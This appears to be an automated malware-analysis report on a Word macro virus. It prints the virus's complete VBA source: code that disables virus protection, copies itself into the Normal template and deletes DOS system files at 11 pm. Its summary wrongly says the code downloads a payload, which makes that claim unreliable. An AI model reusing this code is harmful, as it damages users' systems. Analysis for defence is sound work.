Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 67c7aaff1687aa76…

MALICIOUS

Office (OLE)

30.0 KB Created: 2001-02-09 17:07:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ed80cd584b616f002493aa8e85a0cf13 SHA-1: ed7c6433793bb8d478f10faa60f372675432f788 SHA-256: 67c7aaff1687aa76af581f7aff24a29a1fe7dd43415be778096062287556e3dd
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains multiple high and critical severity heuristics indicating the presence of VBA macros designed to execute code. Specifically, the AutoOpen and Auto_Close macros, along with a Shell() call, suggest an attempt to run arbitrary commands. The script also attempts to copy itself to the NormalTemplate and execute a subroutine named 'doit', which is likely responsible for downloading and executing a secondary payload.

Heuristics 7

  • ClamAV: Doc.Trojan.Titch-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Titch-6
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2500 bytes
SHA-256: e3c3e91189c73c8df8d045d3bcb902c49579c644b84dcaffe384df5b13bdf853
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Colgate"
'Colgate.... badnews for a bad world
'Using your computer L8@nite is bad for you
Sub makeit()
On Error Resume Next
Application.Options.VirusProtection = False
Application.Options.SaveNormalPrompt = False
Application.Options.ConfirmConversions = False
Application.CommandBars("Tools").Controls("Macro").Enabled = False
Dim mod_count As Integer
Dim gotit As Boolean
gotit = False
mod_count = 1

For mod_count = 1 To NormalTemplate.VBProject.VBComponents.Count
  If NormalTemplate.VBProject.VBComponents.Item(mod_count).CodeModule.Lines(2, 1) = "'colgate" Then gotit = True
Next mod_count

If Not gotit Then
  Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "colgate", wdOrganizerObjectProjectItems
End If

If NormalTemplate.Saved = False Then NormalTemplate.Save

gotit = False
mod_count = 1
For mod_count = 1 To ActiveDocument.VBProject.VBComponents.Count
  If ActiveDocument.VBProject.VBComponents.Item(mod_count).CodeModule.Lines(1, 1) = "'Colgate.... badnews for a bad world" Then gotit = True
Next mod_count

If Not gotit Then
  NormalTemplate.VBProject.VBComponents("colgate").Export ("c:\colgate.tmp")
  ActiveDocument.VBProject.VBComponents.Import ("c:\colgate.tmp")
  ActiveDocument.SaveAs ActiveDocument.FullName
  Kill ("c:\colgate.tmp")
End If
If DatePart("h", Time) = 23 Then
  doit
End If
End Sub

Sub doit()
On Error Resume Next
Dim dosit As Boolean
Application.CommandBars("File").Enabled = False
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("View").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
Application.CommandBars("Tools").Enabled = False
Application.CommandBars("Table").Enabled = False
Application.CommandBars("Window").Enabled = False
Application.CommandBars("Help").Enabled = False
dosit = Shell("C:\windows\command\attrib.exe -r -h -s C:\*.*")
Kill ("C:\autoexec.bat")
Kill ("C:\IO.SYS")
Kill ("C:\MSDOS.SYS")
Kill ("C:\Command.com")
End Sub
Sub AutoClose()
On Error Resume Next
makeit
End Sub

Sub AutoSave()
On Error Resume Next
makeit
End Sub

Sub AutoOpen()
On Error Resume Next
makeit
End Sub